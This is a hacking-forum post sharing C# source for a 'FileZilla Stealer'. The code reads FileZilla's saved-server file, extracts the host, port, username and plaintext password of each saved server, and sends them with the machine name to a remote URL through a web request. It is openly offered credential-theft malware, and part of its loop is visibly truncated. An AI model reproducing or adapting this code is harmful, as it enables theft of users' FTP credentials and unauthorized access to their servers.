• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

C# [Snippet] Filezilla Stealer [C#]

Status
Not open for further replies.

sQuo

~ KillmeMories ~
Shadow
User
Joined
Oct 16, 2011
Messages
5,851
Reputation
0
Reaction score
22,904
Points
688
Credits
0
‎13 Years of Service‎
24%
Code:
>public static string kLblosnDhhhJ()
{
   XmlDocument document = new XmlDocument();
   object left = null;
   string str2 = "";
   string path = Interaction.Environ("appdata") + @"\FileZilla\recentservers.xml";
   if (File.Exists(path))
   {
       try
       {
           document.Load(path);
           XmlNodeList elementsByTagName = document.GetElementsByTagName("Host");
           XmlNodeList list = document.GetElementsByTagName("Port");
           XmlNodeList list2 = document.GetElementsByTagName("User");
           XmlNodeList list4 = document.GetElementsByTagName("Pass");
           int num2 = elementsByTagName.Count - 1;
           for (int i = 0; i             {
               left = Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(left, "Application: FileZilla"), "\r\n"), "Host: "), elementsByTagName[i].InnerText), "\r\n"), "Port: "), list[i].InnerText), "\r\n"), "Username: "), list2[i].InnerText), "\r\n"), "Password: "), list4[i].InnerText), "\r\n"), "\r\n");
               new WebClient().DownloadString("?action=add&a=15&u=" + elementsByTagName[i].InnerText + "&l=" + list2[i].InnerText + "&p=" + list4[i].InnerText + "&c=" + MyProject.Computer.Name.ToString());
           }
           str2 = Conversions.ToString(left);
       }
       catch (Exception exception1)
       {
           ProjectData.SetProjectError(exception1);
           Exception exception = exception1;
           ProjectData.ClearProjectError();
       }
   }
   return str2;
}
 
Status
Not open for further replies.
Back
Top